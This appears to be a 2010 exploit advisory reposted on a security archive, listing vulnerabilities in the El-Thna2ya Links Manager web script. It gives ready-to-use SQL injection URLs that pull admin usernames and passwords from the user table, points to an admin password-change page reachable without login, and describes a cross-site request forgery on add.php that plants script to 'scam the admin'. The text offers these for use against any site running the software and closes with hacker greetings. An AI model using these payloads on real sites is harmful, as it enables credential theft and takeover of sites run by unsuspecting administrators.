El-Thna2ya Links Manager suffers from cross site request forgery and remote SQL injection vulnerabilities.
a639412ce2fb1301adb49102f9686e0b4750cae15ba9ff6432e402acebcb92cf
#########################################################################################
# Exploit Title : El-Thna2ya Links Manager Multiple Vulnerabilities
# Date : 20 - 6 - 2010
# Author : S.W.T
# Software Link : https://www.mediafire.com/?mjjfjmyzmej
# Version : All Versions
# Tested on : Linux
# Home : WwW.SeC-WaR.CoM <https://www.sec-war.com/>
#########################################################################################
-== SQL Injection Vulenrability ==-
https://www.[site].com/[path]/go.php?id=[SQL1]
[SQL1] =
go.php?id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6+from+user--
https://www.[site].com/[path]/showcat.php?id=[SQL2]
[SQL2]=UniOn+AlL+SelEct+1,concat(username,0x3a,password),3+from+user--
#########################################################################################
-== Change Password Vulenrability ==-
The Script Can Bypass The Login Page Of Admin And Chnage The Password Of The
Admin
https://www.[site].com/[path]/admin/chang_u_p.php
#########################################################################################
-== CSRF Vulenrability ==-
https://www.[site].com/[path]/add.php
Here You Can Add A New Site To The DataBase
You Can Replace The Site With [XSS] Code
And It Will Scam The Admin xD
#########################################################################################
-== Greetz =-
G3n1ux - PrEdAtOr - xXx - Alnjm33 - xR57 - Ahmadso - Jamba - Dr.silent hill
FireStorm - Mr-Alsaeek - Mr.Viktoor
#########################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed